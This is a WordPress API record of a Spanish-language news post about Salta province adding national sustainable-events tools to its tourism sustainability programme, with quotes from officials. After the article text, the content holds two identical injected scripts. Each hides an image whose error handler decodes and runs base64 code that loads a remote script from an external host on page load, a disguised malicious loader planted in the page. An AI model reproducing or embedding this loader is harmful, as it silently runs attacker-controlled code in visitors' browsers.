{"id":3295,"date":"2023-11-15T10:56:34","date_gmt":"2023-11-15T13:56:34","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3295"},"modified":"2025-08-14T00:05:19","modified_gmt":"2025-08-14T03:05:19","slug":"salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3295","title":{"rendered":"Salta incorpora herramientas al programa provincial de sostenibilidad tur\u00edstica"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#b0133a\"><em>La Provincia est\u00e1 a la vanguardia con el trabajo por la sostenibilidad del destino. A los puntos de abordaje del programa provincial, integra el desarrollo aplicable al turismo de reuniones presentado por la Naci\u00f3n.<\/em><\/h4>\n\n\n\n<p>Este a\u00f1o se lanz\u00f3 el programa \u201c<strong>Salta, por un Destino Sostenible\u201d<\/strong>&nbsp;frente a los desaf\u00edos que genera el cambio clim\u00e1tico, la propia actividad y la tendencia del mercado. Impulsa compromisos orientados al bienestar de la poblaci\u00f3n, a la creaci\u00f3n de territorios de calidad: tierras &nbsp;productivas, ambientes saludables y una poblaci\u00f3n con mejor calidad de vida. Puede descargarse en&nbsp;<a href=\"https:\/\/visitsalta.ar\/\">https:\/\/visitsalta.ar\/<\/a>.<\/p>\n\n\n\n<p>En base a este trabajo, el&nbsp;<strong>Ministerio de Turismo y Deportes<\/strong>&nbsp;de la Naci\u00f3n present\u00f3 en Salta la Gu\u00eda Pr\u00e1ctica para la Elaboraci\u00f3n de un Perfil de Destino de Eventos y con la presencia del sector privado salte\u00f1o, el \u201cManual de Eventos Sostenibles\u201d. &nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9871-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9871-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica.jpg\" alt=\"Salta incorpora herramientas al programa provincial de sostenibilidad tur\u00edstica\" width=\"405\" height=\"270\"\/><\/a><\/figure><\/div>\n\n\n<p>\u201cDentro del plan Liderar, como un eje transversal, tenemos el programa de Sostenibilidad, por eso agradecemos este trabajo con la Naci\u00f3n y con el sector de organizadores de eventos. Nuestras acciones cuentan con 28 puntos de trabajo enfocados en una mirada de cuidar los recursos y ahora, incorporamos este desarrollo presentado hoy por la Naci\u00f3n\u201d, indic\u00f3 el ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>. &nbsp;<\/p>\n\n\n\n<p>El funcionario salte\u00f1o tambi\u00e9n habl\u00f3 sobre la inversi\u00f3n en infraestructura que realiza la Provincia para el crecimiento de turismo de reuniones, complementaria a inversiones privadas, siempre con una mirada sostenible. \u201cSabemos lo que significa el turismo de reuniones y el impacto que tiene en la econom\u00eda\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3296\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5270-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica.jpg\" alt=\"\" class=\"wp-image-3296\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5270-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5270-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5270-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5270-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5270-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3298\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5271-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica.jpg\" alt=\"\" class=\"wp-image-3298\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5271-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5271-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5271-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5271-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5271-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"3297\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5272-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica.jpg\" alt=\"\" class=\"wp-image-3297\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5272-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5272-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5272-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5272-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5272-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>La secretaria de Promoci\u00f3n Tur\u00edstica Yanina Mart\u00ednez se refiri\u00f3 a las herramientas presentadas a trav\u00e9s del plan ActivAR para fortalecer el circuito MICE. La funcionaria nacional clasific\u00f3 en tres estas etapas; primero profesionalizando el capital humano, en segundo lugar, buscar la innovaci\u00f3n con herramientas creativas y en tercer orden, captar y buscar eventos. \u201cPor eso incorporamos la sostenibilidad, que no es una tendencia sino una realidad para mitigar el impacto en el ambiente, y ver c\u00f3mo hacemos que las comunidades vivan mejor\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9872-salta-incorpora-herramientas-al-programa-provincial-de-sostenibilidad-turistica.jpg\" alt=\"\" width=\"343\" height=\"229\"\/><\/figure><\/div>\n\n\n<p>Por \u00faltimo, felicit\u00f3 al equipo tur\u00edstico de Salta por el trabajo que \u201cubica al destino como uno de los m\u00e1s elegidos de Argentina\u201d, destac\u00f3 lo realizado en la gastronom\u00eda y anunci\u00f3 que se trabajar\u00e1 para que la provincia sea incorporada a la Gu\u00eda Michel\u00edn, \u201cpotenciando la cadena de valor, desde las comunidades rurales hasta el plato que se sirve en un restaurante\u201d.<\/p>\n\n\n\n<p>El Manual de Eventos Sostenibles y la Gu\u00eda Pr\u00e1ctica para la elaboraci\u00f3n de un perfil de Destino de Eventos fueron presentadas por la directora de Fiestas Nacionales y Eventos, Fernanda Rodr\u00edguez. En representaci\u00f3n del sector privado de Salta, estuvo el presidente del Convention and Visitors Bureau, Daniel Astorga.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvieron presentes, la secretaria de Turismo Nadia Loza, el presidente de la C\u00e1mara de Turismo de Salta, Juan Lucero, la Subsecretaria de Promoci\u00f3n y Marketing, Laura Alcorta, la presidente del Centro de Convenciones Salta, Andrea Pieve, los intendentes de Cachi, Am\u00e9rico Liendro y de Chicoana, Esteban Ivetich; tambi\u00e9n el senador por Rosario de la Frontera, Javier M\u00f3nico, directores y secretarios de turismo de distintos municipios.&nbsp;<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Provincia est\u00e1 a la vanguardia con el trabajo por la sostenibilidad del destino. A los puntos de abordaje del programa provincial, integra el desarrollo aplicable al turismo de reuniones presentado por la Naci\u00f3n. Este a\u00f1o se lanz\u00f3 el programa \u201cSalta, por un Destino Sostenible\u201d&nbsp;frente a los desaf\u00edos que genera el cambio clim\u00e1tico, la propia [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3299,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-3295","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3295"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3295"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3295\/revisions"}],"predecessor-version":[{"id":6919,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3295\/revisions\/6919"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3299"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3295"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3295"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3295"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}